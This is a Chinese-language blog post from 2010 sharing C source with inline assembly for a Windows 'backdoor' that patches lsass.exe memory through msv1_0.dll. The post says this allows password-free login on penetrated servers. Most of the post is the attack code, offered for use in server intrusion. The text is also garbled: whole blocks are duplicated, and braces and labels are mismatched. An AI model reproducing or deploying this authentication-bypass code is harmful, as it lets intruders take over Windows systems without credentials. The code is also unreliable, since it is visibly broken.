作者在 2010-04-15 13:58:42 发布以下内容
c语言windows后门
在WINDOWS服务器渗透的时候可能用的着,也可以让xx界里的朋友学点东西
功能在帐户有组策略限制的时候,无法添加管理员账号的时候,
可以不用密码登陆。
测试在XP,2000,2003上过。运行后不需要用密码。模仿GOLDSUN的那个写的。
// get.cpp : 定义控制台应用程序的入口点。
//
#include "stdio.h"
#include <windows.h>
#include <TLHELP32.H>
功能在帐户有组策略限制的时候,无法添加管理员账号的时候,
可以不用密码登陆。
测试在XP,2000,2003上过。运行后不需要用密码。模仿GOLDSUN的那个写的。
// get.cpp : 定义控制台应用程序的入口点。
//
#include "stdio.h"
#include <windows.h>
#include <TLHELP32.H>
BOOL EnablePriv()//提升进程权限
{
HANDLE hToken;
if ( OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken) )
{
TOKEN_PRIVILEGES tkp;
LookupPrivilegeValue( NULL,SE_DEBUG_NAME,&tkp.Privileges[0].Luid ); //修改进程权限
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges( hToken,FALSE,&tkp,sizeof tkp,NULL,NULL ); //通知系统修改进程权限
{
HANDLE hToken;
if ( OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken) )
{
TOKEN_PRIVILEGES tkp;
LookupPrivilegeValue( NULL,SE_DEBUG_NAME,&tkp.Privileges[0].Luid ); //修改进程权限
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges( hToken,FALSE,&tkp,sizeof tkp,NULL,NULL ); //通知系统修改进程权限
return( (GetLastError()==ERROR_SUCCESS) );
}
return TRUE;
}
return TRUE;
DWORD getpid()
{
HANDLE toolhelp;
toolhelp = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pe32;
pe32.dwSize=sizeof(PROCESSENTRY32);
BOOL bRet = Process32First(toolhelp,&pe32);
while(bRet)
{
if (0 == strcmp(CharLower(pe32.szExeFile),"lsass.exe")) return pe32.th32ProcessID;
bRet = Process32Next(toolhelp,&pe32);
}
}
CloseHandle(toolhelp);
}
int main(void)
{
HMODULE hmodule;
DWORD temp,pid;
HANDLE process;
char buffer[2];
DWORD writbyte;
EnablePriv();
hmodule = LoadLibrary("msv1_0.dll");
__asm{
pushad
mov eax,hmodule
bijiao: cmp byte PTR [eax],8bh
jnz sarchnext
cmp byte PTR [eax+1],4dh
jnz sarchnext
cmp byte PTR [eax+2],0ch
jnz sarchnext
cmp byte PTR [eax +3],49h
jz finds
{
HMODULE hmodule;
DWORD temp,pid;
HANDLE process;
char buffer[2];
DWORD writbyte;
EnablePriv();
hmodule = LoadLibrary("msv1_0.dll");
__asm{
pushad
mov eax,hmodule
bijiao: cmp byte PTR [eax],8bh
jnz sarchnext
cmp byte PTR [eax+1],4dh
jnz sarchnext
cmp byte PTR [eax+2],0ch
jnz sarchnext
cmp byte PTR [eax +3],49h
jz finds
sarchnext:inc eax
jmp night
finds :
mov temp,eax
popad
}
__asm{
pushad
mov eax,temp
sear: cmp byte PTR [eax],32h
jnz searnext
cmp byte PTR [eax+1],11000000b
jnz searnext
jz findss
searnext: inc eax
jmp sear
findss: mov temp,eax
popad
}
// memset((LPVOID)temp,0xb0,1);
// memset((LPVOID)(temp+1),0x01,1);
jmp night
finds :
mov temp,eax
popad
}
__asm{
pushad
mov eax,temp
sear: cmp byte PTR [eax],32h
jnz searnext
cmp byte PTR [eax+1],11000000b
jnz searnext
jz findss
searnext: inc eax
jmp sear
findss: mov temp,eax
popad
}
// memset((LPVOID)temp,0xb0,1);
// memset((LPVOID)(temp+1),0x01,1);
pid = getpid();
process = OpenProcess(PROCESS_ALL_ACCESS,false,pid);
memset(buffer,0xb0,1);
memset((LPVOID)(buffer+1),0x01,1);
WriteProcessMemory(process,(LPVOID)temp,buffer,sizeof(buffer),&writbyte);
writbyte =GetLastError();
printf("%d",writbyte);
//MessageBox(NULL,"find ok","title",MB_OK);
// FreeLibrary(hmodule);
return 0;
process = OpenProcess(PROCESS_ALL_ACCESS,false,pid);
memset(buffer,0xb0,1);
memset((LPVOID)(buffer+1),0x01,1);
WriteProcessMemory(process,(LPVOID)temp,buffer,sizeof(buffer),&writbyte);
writbyte =GetLastError();
printf("%d",writbyte);
//MessageBox(NULL,"find ok","title",MB_OK);
// FreeLibrary(hmodule);
return 0;
}